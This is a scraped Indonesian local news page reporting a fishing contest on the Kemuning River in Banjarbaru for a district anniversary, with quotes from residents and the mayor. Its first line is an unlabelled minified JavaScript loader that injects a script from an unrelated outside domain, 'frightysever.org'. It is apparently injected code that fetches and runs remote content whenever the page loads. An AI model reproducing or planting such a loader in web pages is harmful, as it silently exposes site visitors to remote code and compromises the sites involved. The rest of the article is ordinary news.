(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kota Banjarbaru

Lomba Mancing Ikan di Sungai Kemuning Meriahkan HUT ke-17 Kecamatan Banjarbaru Selatan


KANALKALIMANTAN.COM, BANJARBARU – Warga Kecamatan Banjarbaru Selatan antusias memeriahkan lomba memancing ikan yang digelar di siring Sungai Kemuning, Kelurahan Guntung Paikat, Kecamatan Banjarbaru Selatan, Sabtu (27/4/2024) pagi.

Kegiatan lomba memancing digelar di kawasan Jembatan Sumberadi tersebut merupakan bagian dari kemeriahan perayaan Hari Jadi ke-25 Kota Banjarbaru dan HUT ke-17 Kecamatan Banjarbaru Selatan.

Sejak pagi hari, mancing mania berlomba mendapatkan ikan yang sebelumnya disebar oleh Wali Kota Banjarbaru, Aditya Mufti Ariffin.

Raut wajah Jumiati, salah satu mancing mania penuh semangat ikut ambil bagian dalam lomba memancing yang turun bersama sang suami.

Baca juga: Lelaki di Banjarmasin Habisi Kakak Ipar, Jasad Dibuang ke Wilayah Kintap

“Karena gratis kita ikut, sekaligus menyalurkan hobi si bapak, dan kebetulan adik juga punya tambak ikan jadi kita antusias ikut lomba mancing di sini,” ujar Jumiati, warga bantaran Sungai Kemuning.

Jumiati bersama suami mengaku tak pernah absen bila mengikuti lomba mancing yang digelar di Kecamatan Banjarbaru Selatan.

“Lomba mancing dalam rangka HUT Kecamatan Banjarbaru Selatan ini pertama kalinya diadakan, tapi kita pasti rutin ikut lomba mancing saat 17-an,” ungkapnya.

Meski tak ada persiapan khusus, Jumiati berharap bisa membawa pulang salah satu doorprize yang disediakan panitia.

Baca juga: Peduli Korban Kebakaran di Cempaka, Srikandi PLN Salurkan Bantuan Perlengkapan Dapur

Sebelum menyebar ikan di sungai Kemuning ini, Wali Kota Aditya bersama masyarakat melakukan kegiatan bersih-bersih Sungai Kemuning sebagai upaya meningkatkan populasi ikan di sungai.

Menurutnya, kondisi air di Sungai Kemuning ini masih cukup bersih dan masih dapat digunakan untuk memancing ikan.

“Kondisi air di Sungai Kemuning cukup bersih dan bisa digunakan untuk kegiatan memancing, ikan pun masih bisa ditebar dan hidup di lingkungan sungai,” ungkap Aditya Mufti Ariffin.

Dirinya mengatakan siap mendukung kegiatan tersebut agar dapat menjadi acara tahunan dalam upaya menjaga ekosistem sungai yang sehat.

Baca juga: Relokasi Normalisasi Sungai Kuranji di Cempaka Warga Ada yang Tak Setuju

“Kedepan kami wacanakan untuk membuka pintu air di daerah Jalan Jeruk agar aliran sungai bisa lebih baik dan air tetap terjaga kebersihannya,” sambung dia.

Sementara itu, Lurah Guntung Paikat, Muhammad Arifin mengatakan, lokasi penebaran bibit ikan di Sungai Kemuning Guntung Paikat merupakan kawasan sungai yang cocok untuk kegiatan memancing.

“Dalam kawasan ini, terdapat area sungai yang memiliki kedalaman yang cukup dan sangat baik untuk memancing ikan, dan juga dikelola oleh masyarakat sekitar untuk budidaya ikan,” ungkap Lurah Guntung Paikat.

Dengan langkah progresif ini juga, Pemerintah Kota Banjarbaru tidak hanya berhasil meningkatkan kualitas lingkungan hidup, tetapi juga membuka peluang baru dalam pengembangan sektor pariwisata yang berkelanjutan. (Kanalkalimantan.com/wanda)

Reporter : wanda
Editor : bie


Risa

Recent Posts

Peternakan Babi Dekat Kampus UIN Antasari di Guntung Manggis Dikeluhkan

Pemilik Ternak Diminta Datang ke Kantor Satpol PP Banjarbaru Read More

6 jam ago

Rekayasa Pemasangan ATSC, Jalan Pangeran Suriansyah Steril Parkir dan PKL

KANALKALIMANTAN.COM, BANJARBARU - Kawasan pinggir jalan maupun median di Jalan Pangeran Suriansyah, Kota Banjarbaru, Kalimantan… Read More

8 jam ago

Pj Bupati HSU Resmikan TMMD ke-120 di Desa Sungai Karias

KANALKALIMANTAN.COM, AMUNTAI - Penjabat (Pj) Bupati Hulu Sungai Utara (HSU) Zakly Asswan secara resmi membuka… Read More

9 jam ago

Sekat Bakar Antisipasi Karhutla Ring 1 Bandara Syamsudin Noor

KANALKALIMANTAN.COM, BANJARBARU - Provinsi Kalimantan Selatan kembali memfokuskan penanganan ancaman kebakaran hutan dan lahan (Karhutla)… Read More

9 jam ago

Buaya di Pelambuan Banjarmasin Gagal Ditangkap, Tiga Kali Terlihat Warga Muncul

KANALKALIMANTAN.COM, BANJARMASIN - Kemunculan seekor buaya di kawasan sungai Kelurahan Pelambuan, Kecamatan Banjarmasin Utara, Kota… Read More

13 jam ago

Ambulans Baru Layanan Puskesmas Keliling di Banjarbaru

KANALKALIMANTAN.COM, BANJARBARU – Dinas Kesehatan (Dinkes) Kota Banjarbaru hadirkan layanan kesehatan yang lebih dekat dengan… Read More

13 jam ago

This website uses cookies.